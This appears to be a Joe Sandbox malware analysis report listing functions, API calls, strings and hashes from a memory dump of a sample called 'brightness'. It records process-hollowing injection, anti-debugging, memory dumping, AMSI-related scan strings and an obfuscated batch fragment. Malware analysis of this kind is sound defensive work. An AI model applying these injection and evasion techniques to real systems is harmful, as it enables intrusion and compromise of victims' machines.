\\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
API String ID: 2010126900-181751239
Opcode ID: e9546d1bfed3d17c6b1aad43b83dc3b32c87e75dc15a3a733ee9f3b03ca4ba06
Instruction ID: 4630ce8675d849fa24cd9c8b2c13b3cd4506d60592caf79940752341c65551dc
Opcode Fuzzy Hash: e9546d1bfed3d17c6b1aad43b83dc3b32c87e75dc15a3a733ee9f3b03ca4ba06
Instruction Fuzzy Hash: 7624FD7DA1016C8BDB21EB68DD80ADE73B6BF94304F1080E5E409EB359DB74AE458F52

Function 02848BA8 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0284881C: LoadLibraryA.KERNEL32(00000000,00000000,02848903), ref: 02848850
Part of subcall function 0284881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02848903), ref: 02848860
Part of subcall function 0284881C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 02848879
Part of subcall function 0284881C: FreeLibrary.KERNEL32(74AD0000,00000000,02892388,Function_000065D8,00000004,02892398,02892388,000186A3,00000040,0289239C,74AD0000,00000000,00000000,00000000,00000000,02848903), ref: 028488E3

Part of subcall function 028485D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02848660

GetThreadContext.KERNEL32(000006A8,02892420,ScanString,028923A4,0284A774,UacInitialize,028923A4,0284A774,ScanBuffer,028923A4,0284A774,ScanBuffer,028923A4,0284A774,UacInitialize,028923A4), ref: 0284943A

Part of subcall function 0284824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 028482BD

Part of subcall function 028484BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02848521

Part of subcall function 028479AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02847A1F

Part of subcall function 02847CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02847D6C

SetThreadContext.KERNEL32(000006A8,02892420,ScanBuffer,028923A4,0284A774,ScanString,028923A4,0284A774,Initialize,028923A4,0284A774,000006A4,00222FF8,028924F8,00000004,028924FC), ref: 0284A14F
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000006A8,00000000,000006A8,02892420,ScanBuffer,028923A4,0284A774,ScanString,028923A4,0284A774,Initialize,028923A4,0284A774,000006A4,00222FF8,028924F8), ref: 0284A15C

Part of subcall function 02848798: LoadLibraryW.KERNEL32(bcrypt,?,000006A8,00000000,028923A4,0284A3BF,ScanString,028923A4,0284A774,ScanBuffer,028923A4,0284A774,Initialize,028923A4,0284A774,UacScan), ref: 028487AC
Part of subcall function 02848798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028487C6
Part of subcall function 02848798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000006A8,00000000,028923A4,0284A3BF,ScanString,028923A4,0284A774,ScanBuffer,028923A4,0284A774,Initialize), ref: 02848802

Strings

I_QueryTagInformation, xrefs: 0284A538
bcrypt, xrefs: 0284A3B0, 0284A3C4, 0284A3D8
UacScan, xrefs: 02848CAB, 02848EC3, 028494BF, 028498BB, 02849A2F, 0284A1D9, 0284A671
NtOpenProcess, xrefs: 0284A6DB
ScanString, xrefs: 02848C3A, 02848DE5, 02848F93, 028493BB, 028495A1, 02849728, 02849BB5, 02849D73, 02849EE3, 0284A056, 0284A341, 0284A3EE
ntdll, xrefs: 0284A45D, 0284A471, 0284A529, 0284A6CC, 0284A6E0
MiniDumpWriteDump, xrefs: 0284A54C
MiniDumpReadDumpStream, xrefs: 0284A560
NtReadVirtualMemory, xrefs: 0284A458
dbgcore, xrefs: 0284A551, 0284A565
OpenSession, xrefs: 02848BE1, 02849004, 028490B6, 0284A487, 0284A5CD
BCryptQueryProviderRegistration, xrefs: 0284A3BF
advapi32, xrefs: 0284A53D
sppc, xrefs: 028491AE
UacInitialize, xrefs: 02848E6A, 028491CB, 0284934A, 0284944E, 0284984A, 028499BE, 0284A168
ScanBuffer, xrefs: 02848D04, 02848D8C, 02849127, 0284923C, 028492D9, 02849612, 02849799, 0284992C, 02849B11, 02849C26, 02849DE4, 02849F54, 0284A0C7, 0284A2BB, 0284A4D9, 0284A61F
SLGetLicenseInformation, xrefs: 02849197
NtOpenObjectAuditAlarm, xrefs: 0284A46C, 0284A524
BCryptRegisterProvider, xrefs: 0284A3D3
NtSetSecurityObject, xrefs: 0284A6C7
Initialize, xrefs: 02848F22, 02849530, 028496B7, 02849AA0, 02849D02, 02849E72, 02849FE5, 0284A24A, 0284A57B
BCryptVerifySignature, xrefs: 0284A3AB

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 4083799063-51457883
Opcode ID: dc61a418c95ec945821530bfe17e2b548cd7665237ed0e02f11e189b11cc01a3
Instruction ID: dbb4e3a427d28a0e80a549579840bc2d45d3fac1972c4b868b012d915d89a57b
Opcode Fuzzy Hash: dc61a418c95ec945821530bfe17e2b548cd7665237ed0e02f11e189b11cc01a3
Instruction Fuzzy Hash: 55E2107CA9011C9FEB16EB68CCA0EDE73BAAF45300F1041A1E545EB315DE74AE458F92

Function 02848BA6 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0284881C: LoadLibraryA.KERNEL32(00000000,00000000,02848903), ref: 02848850
Part of subcall function 0284881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02848903), ref: 02848860
Part of subcall function 0284881C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 02848879
Part of subcall function 0284881C: FreeLibrary.KERNEL32(74AD0000,00000000,02892388,Function_000065D8,00000004,02892398,02892388,000186A3,00000040,0289239C,74AD0000,00000000,00000000,00000000,00000000,02848903), ref: 028488E3

Part of subcall function 028485D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02848660

GetThreadContext.KERNEL32(000006A8,02892420,ScanString,028923A4,0284A774,UacInitialize,028923A4,0284A774,ScanBuffer,028923A4,0284A774,ScanBuffer,028923A4,0284A774,UacInitialize,028923A4), ref: 0284943A

Part of subcall function 0284824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 028482BD

Part of subcall function 028484BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02848521

Part of subcall function 028479AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02847A1F

Strings

I_QueryTagInformation, xrefs: 0284A538
bcrypt, xrefs: 0284A3B0, 0284A3C4, 0284A3D8
UacScan, xrefs: 02848CAB, 02848EC3, 028494BF, 028498BB, 02849A2F, 0284A1D9, 0284A671
NtOpenProcess, xrefs: 0284A6DB
ScanString, xrefs: 02848C3A, 02848DE5, 02848F93, 028493BB, 028495A1, 02849728, 02849BB5, 02849D73, 02849EE3, 0284A056, 0284A341, 0284A3EE
ntdll, xrefs: 0284A45D, 0284A471, 0284A529, 0284A6CC, 0284A6E0
MiniDumpWriteDump, xrefs: 0284A54C
MiniDumpReadDumpStream, xrefs: 0284A560
NtReadVirtualMemory, xrefs: 0284A458
dbgcore, xrefs: 0284A551, 0284A565
OpenSession, xrefs: 02848BE1, 02849004, 028490B6, 0284A487, 0284A5CD
BCryptQueryProviderRegistration, xrefs: 0284A3BF
advapi32, xrefs: 0284A53D
sppc, xrefs: 028491AE
UacInitialize, xrefs: 02848E6A, 028491CB, 0284934A, 0284944E, 0284A168
ScanBuffer, xrefs: 02848D04, 02848D8C, 02849127, 0284923C, 028492D9, 02849612, 02849799, 0284992C, 02849B11, 02849C26, 02849DE4, 02849F54, 0284A0C7, 0284A2BB, 0284A4D9, 0284A61F
SLGetLicenseInformation, xrefs: 02849197
NtOpenObjectAuditAlarm, xrefs: 0284A46C, 0284A524
BCryptRegisterProvider, xrefs: 0284A3D3
NtSetSecurityObject, xrefs: 0284A6C7
Initialize, xrefs: 02848F22, 02849530, 028496B7, 02849AA0, 02849D02, 02849E72, 02849FE5, 0284A24A, 0284A57B
BCryptVerifySignature, xrefs: 0284A3AB

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 2852987580-51457883
Opcode ID: ae7e2565ae12cedb99b6cb7840fe8bfb00cf6f1f52135b935e01872439a7b2b8
Instruction ID: 297990b369b6378e639484b8ce8c6a526368a2b14bdd2e213dbfbce9bea122c3
Opcode Fuzzy Hash: ae7e2565ae12cedb99b6cb7840fe8bfb00cf6f1f52135b935e01872439a7b2b8
Instruction Fuzzy Hash: 88E2107CA9011C9FEB16EB68CCA0EDE73BAAF45300F1041A1E545EB315DE74AE458F92

Function 02835A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02830000,0285E790), ref: 02835A94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02830000,0285E790), ref: 02835AB2
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02830000,0285E790), ref: 02835AD0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02835AEE
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02835B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02835B37
RegQueryValueExA.ADVAPI32(?,02835CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02835B7D,?,80000001), ref: 02835B55
RegCloseKey.ADVAPI32(?,02835B84,00000000,?,?,00000000,02835B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02835B77
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02835B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02835BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02835BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02835BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02835C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02835C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02835C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02835C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02835C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02835C97

Strings

Software\Borland\Delphi\Locales, xrefs: 02835AE4
Software\Borland\Locales, xrefs: 02835AA8, 02835AC6

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 3bfd785e2916d0cc76f0bff8e5b4182da16f6d25390cc79155fe9beef331913f
Instruction ID: 7d31e59b48b37cb6463214799bd9763412aac47acce82f12393674953d37a350
Opcode Fuzzy Hash: 3bfd785e2916d0cc76f0bff8e5b4182da16f6d25390cc79155fe9beef331913f
Instruction Fuzzy Hash: 77519C7DA4024C7EFB22D6A8CC46FEF77BD9B08744F8005A1A608E6181D7789A44CFE5

Function 02848798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,?,000006A8,00000000,028923A4,0284A3BF,ScanString,028923A4,0284A774,ScanBuffer,028923A4,0284A774,Initialize,028923A4,0284A774,UacScan), ref: 028487AC
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028487C6
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000006A8,00000000,028923A4,0284A3BF,ScanString,028923A4,0284A774,ScanBuffer,028923A4,0284A774,Initialize), ref: 02848802

Part of subcall function 02847CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02847D6C

Strings

bcrypt, xrefs: 028487AB
BCryptVerifySignature, xrefs: 028487BF

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 3c551edc5e455c3a9af3d918d61743e12e8f610f4a44b376cb28ca3c35649ab2
Instruction ID: 0d6438f54a3264d1a076e05a22d1ebff508246ba864139b5a54a8e9895d1f482
Opcode Fuzzy Hash: 3c551edc5e455c3a9af3d918d61743e12e8f610f4a44b376cb28ca3c35649ab2
Instruction Fuzzy Hash: E7F0C87DA81328FFE310AA6DAC44F16379CB782314F0C0929BA08C71E4DB740414AB94

Function 0284F024 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 0284F034
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0284F046
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0284F05D

Strings

CheckRemoteDebuggerPresent, xrefs: 0284F040
KernelBase, xrefs: 0284F02F

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 83fe20b13194929b5f80680e7b0c34ba0aa6e60d934ea1f2c54a7ed495357589
Instruction ID: ebc55851c013aed7f88c3cafcb989e7a95a94a61778ded65c4f9b05d16def281
Opcode Fuzzy Hash: 83fe20b13194929b5f80680e7b0c34ba0aa6e60d934ea1f2c54a7ed495357589
Instruction Fuzzy Hash: 2CF0273C90021CBBEB11B6AC88887DDFBB85B25328F2403C8A524E21C1FB751650C692

Function 0284DFE4 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02834ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02834EDA

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0284E0B4), ref: 0284E01F
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0284E0B4), ref: 0284E04F
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0284E064
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0284E090
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0284E099

Part of subcall function 02834C0C: SysFreeString.OLEAUT32(0284ED84), ref: 02834C1A

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: dae91b11d0e559dfc5a8ddc9b6143c60d7f750dcb7a8c82d2abef87479518c9b
Instruction ID: 7ed0940dd9940be7713d37366e6c8b92cc042472dcef0b3815641337ec2b7dd9
Opcode Fuzzy Hash: dae91b11d0e559dfc5a8ddc9b6143c60d7f750dcb7a8c82d2abef87479518c9b
Instruction Fuzzy Hash: BB21A47965070CBBEB11EAD8CC56FDE77BDAB48B04F500461B700F71C0DAB4AA058B96

Function 0284E72C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0284E86A

Strings

OpenSession, xrefs: 0284E80C
Initialize, xrefs: 0284E75A
ScanBuffer, xrefs: 0284E7B3

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 34cb8f97895cbf4763d378502178bbd803b8ff3b3c7835cffb41f722c019754b
Instruction ID: 57277859474292a67ad21660486b1471fdbf69052e40f4891f91bb4492e4b2f7
Opcode Fuzzy Hash: 34cb8f97895cbf4763d378502178bbd803b8ff3b3c7835cffb41f722c019754b
Instruction Fuzzy Hash: 12410B7DA1020C9FEB12EBA8D880A9EB7FAFF98710F214461E401E7251DE74AD058F52

Function 0284DF00 Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02834ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02834EDA

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0284DFD2), ref: 0284DF3F
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0284DF79
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0284DFA6
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0284DFAF

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 1a2862b01432c1a9a585e5f0d728fc547fa7ef18a008c8af367d4c645281a873
Instruction ID: 0642c20befa837750bac6bc265612a7c0cbd8d992b72acdb7bc660b8723d1804
Opcode Fuzzy Hash: 1a2862b01432c1a9a585e5f0d728fc547fa7ef18a008c8af367d4c645281a873
Instruction Fuzzy Hash: 3721E079A4030CBBEB21EBE4CC42F9EB7BD9B04B00F504161B600F75D0DBB4AE048A96

Function 028479AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02848018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02848088,?,?,00000000,?,028479FE,ntdll,00000000,00000000,02847A43,?,?,00000000), ref: 02848056
Part of subcall function 02848018: GetModuleHandleA.KERNELBASE(?), ref: 0284806A

Part of subcall function 028480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02848148,?,?,00000000,00000000,?,02848061,00000000,KernelBASE,00000000,00000000,02848088), ref: 0284810D
Part of subcall function 028480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02848113
Part of subcall function 028480C0: GetProcAddress.KERNEL32(?,?), ref: 02848125

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02847A1F

Strings

yromeMlautriVetacollAwZ, xrefs: 028479C7
ntdll, xrefs: 028479F4

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

